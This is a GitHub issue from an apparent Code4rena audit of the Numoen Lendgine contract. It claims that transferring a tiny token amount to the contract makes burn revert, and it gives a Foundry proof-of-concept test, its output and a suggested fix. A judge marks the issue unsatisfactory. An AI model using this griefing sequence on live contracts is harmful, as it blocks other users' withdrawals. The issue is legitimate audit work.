search

code-423n4 / 2023-01-numoen-findings

0 stars 0 forks source link

va malicious user can make that the function burn doesn't work #188

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/code-423n4/2023-01-numoen/blob/2ad9a73d793ea23a25a381faadc86ae0c8cb5913/src/core/Lendgine.sol#L105-L120

Vulnerability details

Impact

A user can be dedicated to sending tokens lendgine every time that someone wants call function burn causing revert by InvariantError()

i marked this how a medium because can solucionate with parameters adequates at moment call burn, but if attacker insistent can be a problem high

Proof of Concept

test

  function testDoS() external {

  _deposit(address(this), address(this), 2 ether  , 16 ether , 2 ether);
  _mint(cuh, cuh, 5 ether);
  _mint(dennis, dennis, 5 ether);

  vm.prank(dennis);
  lendgine.transfer(address(lendgine),1);

    emit log("burn-");

    vm.startPrank(cuh);
      token0.approve(address(this), 0.5 ether);
      token1.approve(address(this), 4 ether);
      vm.stopPrank();

      vm.expectRevert(Pair.InvariantError.selector);//***********Revert by InvariantError()******************

      uint256 collateral2 = lendgine.burn(
      cuh,
      abi.encode(
        PairMintCallbackData({
          token0: address(token0),
          token1: address(token1),
          amount0: 0.5 ether,
          amount1: 4 ether,
          payer: cuh
        })
      )
    );

  }

result

Running 2 tests for test/BurnTest.t.sol:BurnTest
[PASS] testDoS() (gas: 540203)
Logs:
burn-

Tools Used

foundry

Recommended Mitigation Steps

could be fixed adding an equation that calculate the parameters on proportion at de value of shares in el parameter mint(liquidity, data);

https://github.com/code-423n4/2023-01-numoen/blob/2ad9a73d793ea23a25a381faadc86ae0c8cb5913/src/core/Lendgine.sol#L117
c4-judge commented 1 year ago

berndartmueller marked the issue as unsatisfactory: Insufficient quality